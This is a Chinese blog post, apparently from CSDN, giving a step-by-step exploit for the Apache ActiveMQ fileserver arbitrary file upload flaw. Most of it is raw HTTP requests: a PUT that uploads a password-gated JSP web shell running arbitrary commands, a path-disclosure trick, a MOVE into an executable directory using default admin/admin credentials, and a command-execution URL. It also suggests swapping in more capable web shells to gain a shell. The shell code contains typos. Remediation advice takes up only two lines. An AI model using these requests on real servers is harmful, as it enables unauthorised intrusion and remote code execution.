ActiveMQ  任意文件上传 漏洞 PUT

已于 2023-05-26 09:06:35 修改
阅读量1.1k 收藏
点赞数 3
文章标签: 网络安全 web安全 Powered by 金山文档
于 2023-01-10 14:58:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/U_U520/article/details/128630008
版权

ActiveMQ是什么?

是消息队列的容器,专注于高并发的环境,比如天猫淘宝一秒钟上亿请求,就好比是水池,把大量短时间无法处理的数据,冗余囤积到ActiveMQ里,再分门别类,按类专门处理,从而提高处理效率。

介绍:

登录admin账号:默认账号admin/admin,抓包进行修改,使用PUT方法上传文件。

ActiveMQ Web控制台分为三个应用程序:其中admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能使用,fileserver不需要登录。

1  PUT上传 

PUT /fileserver/3.jsp HTTP/1.1
Host: xxxxxxxxxxx:30004
Authorization: Basic YWRta46YWRtaW4=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.76
Content-Length: 334
 
<%if("023".equals(request.getParameter("pwd"))){java.io.InputSteam in =Runtime.getRuntime().exec(request.getParameter("1")).getInputStram();inta = -1;byte[]b =new byte[2048];out.print("");
                while((a=in.read(b))!=-1){
                        out.println(neString(b,0,a));
                }
                out.print("");
        }
%>

2获取绝对路径

总结了两种方法

方法1    PUT  /fileserver/a../../%08/..%08/.%08/%08

PUT /fileserver/a../../%08/..%08/.%08/%08 HTTP/1.1
Host: xxxxxxxxxxx:30004
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 1


返回包
HTTP/1.1 500 /usr/local/apache-activemq-5.9.0这里是绝对路径/webapps/fileserver//.././\\ (No such file or directory)
Server: Jetty(7.6.9.v20130131)

方法2

GET /admin/test/systemProperties.jsp

3移动

MOVE /fileserver/3.jsp HTTP/1.1
Host: xxxxxxx:8161
Destination: file:///E:\ApacheMQ\apache-activemq-5.9.0\webapps\api\3.jsp   #绝对路径放这里
Authorization: Basic YWRtaW46YWRtaW4=      #这个必写
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 328
 
<%if("023".equals(request.getParameter("pwd"))){java.io.InputStream in =Runtime.getRntime().exec(request.getParmeter("i")).getInputStream();inta = -1;byte[]b =new byte[2048];out.print("");
                while((a=in.read(b))!=-1){
                        out.println(newString(b,0,a));
                }
                out.print("");
        }
%>

4命令执行

http://xx.xx.xx.xxx:30004/api/4.jsp?pwd=023&i=dir

最后了 来个大马。

注意: 返回包必须是204 才能证明执行成功

总结:你可以把最上面的命令执行换成一句话木马,或者冰蝎、特斯拉等马,一步到位直接getshell(最后我传的大马)

漏洞影响

漏洞影响版本:Apache ActiveMQ 5.x ~ 5.14.0

漏洞修复

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。

2、通过移除 conf\jetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能

不动明王_你懂不懂
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
ActiveMQ传输文件的几种方式原理与优劣
KimmKing的技术博客
12-20 5万+
本文讨论ActiveMQ传输文件的几种方法的原理及其利弊,作为消息发送、直接传输文件、使用ftp或http中转。最后介绍扩展ActiveMQ实现自定义文件传输方式,讨论如何实现高效的文件传输。by kimmking 作为消息发送 按照JMS规范,为了保证可靠性,所有的消息都应该是发送到broker,然后交由broker来投递的。也即是说其实JMS是不建议或不支持传输文件的。 对于比较小的文件
消息中间件之ActiveMQ传输文件
sweep_的博客
01-08 8173
Activemq传输文件        我用的是MQ消息中间件activemq来传输文件的,当然还有很多其他的方式,选择哪种方式还请自行搜索各个消息中间件的特点来定。 ActiveMQ传输文件的方式有byteMessage、StreamMessage、BlobMessage。其中bytemessage和streammessage如果不加工处理的话,只能传输小文件,小于100M的文件应该都可以传
ActiveMQ 任意文件上传漏洞复现
YJ_12340的博客
08-30 644
​ 访问 http://ip:8161/admin/ 进入admin登陆页面,使用弱口令登陆,账号密码皆为 admin,登陆成功后,headers中会出现验证信息。​ 将GET协议修改为PUT协议,将文件上传至 fileserver 目录下。​ 同样的,响应包返回的状态码为 204,代表文件成功移动到 api 目录下。​ 继续修改请求包协议为 MOVE,并在头部中添加 Destination。​ 如上图,response 包中返回状态码为 204,即文件上传成功。...
【CVE-2016-3088】 Activemq文件上传以及弱口令
Lazy_ass的博客
11-25 6440
CVE-2016-3088 PUT方法上传文件(自建环境) 漏洞描述: Apache ActiveMQ是美国阿帕奇(Apache)软件基金会的一套开源的消息中间件 Apache ActiveMQ 5.14.0之前5.x版本的Fileserver Web应用中存在安全漏洞。远程攻击者可通过发送HTTP PUT和HTTP MOVE请求利用该漏洞上传并执行任意文件 漏洞复现流程 1: 首先需要判断/fileserver目录是否具有访问权限 2: 访问/admin/test/systemProperties.js
CTF-PUT上传漏洞
不知名白帽的博客
05-27 721
CTF-PUT上传漏洞,实验环境:kali(192.168.20.128),靶机(192.168.20.137)。进行信息探测,漏洞扫描未发现有效信息后,测试PUT漏洞,发现存在PUT漏洞,下载插件Poster(RESTClient),然后上传大马反弹shell
Vulhub靶场ActiveMQ任意文件上传漏洞复现
X_python321的博客
05-08 464
Vulhub靶场ActiveMQ任意文件上传漏洞复现
文件上传漏洞详解
zxcvbnmasdflzl的博客
06-27 827
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果.
ActiveMQ-Artemis .pdf
08-08
Apache ActiveMQ Artemis 所有使用方面的深入手册文档。
activeMQ 服务端客户端 java代码
10-09
activeMQ 服务端客户端 java代码 activeMQ 服务端客户端 java代码
ActiveMQ最新jar包
05-29
ActiveMQ 是Apache出品,最流行的,能力强劲的开源消息总线。ActiveMQ 是一个完全支持JMS1.1和J2EE 1.4规范的 JMS Provider实现,尽管JMS规范出台已经是很久的事情了,但是JMS在当今的J2EE应用中间仍然扮演着特殊的...
ActiveMQ 教学视频/教程 /附带笔记等资源
08-08
ActiveMQ 教学视频/教程 /附带笔记等资源,jms 案例文档等...
activemq linux版本安装包
06-30
activemq linux版本安装包 apache-activemq-5.15.4-bin.tar.gz
TomcatPUT的文件上传漏洞(CVE-2017-12615)
weixin_52458793的博客
02-12 1090
详细教程
【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞
RexHa的博客
02-27 2037
漏洞原理:ActiveMQ中存储文件的fileserver接口支持写入文件,但是没有执行权限。可以通过MOVE文件至其他可执行目录下,从而实现文件写入并访问。ActiveMQ在5.12.x~5.13.x版本中,默认关闭了fileserver这个应用(但是可以在conf/jetty.xml中开启);在5.14.0版本以后,彻底删除了fileserver应用。访问8161端口默认账户密码admin/admin 登录文件上传成功需要有以下几点前提:知道文件上传的绝对路径网站有文件上传功能文件类型没有被限制上传的文
文件上传漏洞
weixin_58954236的博客
09-02 1003
文件上传Web 应用必备功能之一,如,头像上传,附件分享等。如果服务器配置不当或者没有进行足够的过滤,Web 用户就可以上传任意文件,包括恶意脚本文件,exe 程序等等,这就造成了任意文件上传漏洞
文件上传漏洞-02】利用PUT方法上传文件—以Apache为例
m0_64378913的博客
05-31 6418
目录1 http协议请求方法概述2 Apache开启PUT请求方法的过程2.1 实验环境2.3 查询已开启的请求类型2.3 开启put方法3 文件上传漏洞利用3.1 上传PHP探针3.2 上传WebShell4 总结参考文章 1 http协议请求方法概述 具体http/https协议及通信过程可以参考文章《【基础协议】HTTP/HTTPS协议及其工作流程》 常见的请求方法及概述 GET:向特定的资源发出请求。 POST:向指定资源提交数据进行处理请求(例如提交表单或者上传文件)。数据被包含在请求体中。PO
【实战系列3】IIS PUT文件上传漏洞GetShell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
04-10 2105
IIS(Internet Information Services)PUT文件上传漏洞是一种安全漏洞,影响微软的IIS服务器。它允许攻击者通过HTTP PUT请求上传任意文件到服务器上,从而可能导致恶意文件的上传和执行,可能引发远程代码执行攻击,导致服务器被攻陷。
CTF-18.web安全PUT上传漏洞
woo233的博客
10-08 945
中间件包括apache、tomcat、 lIS、 weblogic等, 这些中间件可以设置支持的HTTP方法。(HTTP方法包括GET、POST、 HEAD、 DELETE、 PUT、 OPTIONS等)每一个HTTP方法都有其对应的功能,在这些方法中,PUT可以直接从客户机上传文件到服务器。如果中间件开放了HTTP中的PUT方法,那么恶意攻击者就可以直接上传webshell到服务器对应的目录。直接上传shell,也可以从侧面反映PUT漏洞的严重危害性。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8207
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
ActiveMQ 漏洞
最新发布
10-12
关于 ActiveMQ 漏洞,我可以告诉你一些基本信息。ActiveMQ 是一种流行的开源消息代理,但是它也存在一些漏洞,例如: 1. CVE-2015-5254:ActiveMQ 可能允许未经身份验证的攻击者执行任意代码。 2. CVE-2016-3088:ActiveMQ 可能允许攻击者通过发送恶意的 OpenWire 协议数据包来执行任意代码。 3. CVE-2016-2166:ActiveMQ 可能允许攻击者通过发送恶意的 STOMP 协议数据包来执行任意代码。 为了保护 ActiveMQ,建议及时更新到最新版本,并采取其他安全措施,例如限制网络访问和加强身份验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不动明王_你懂不懂

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值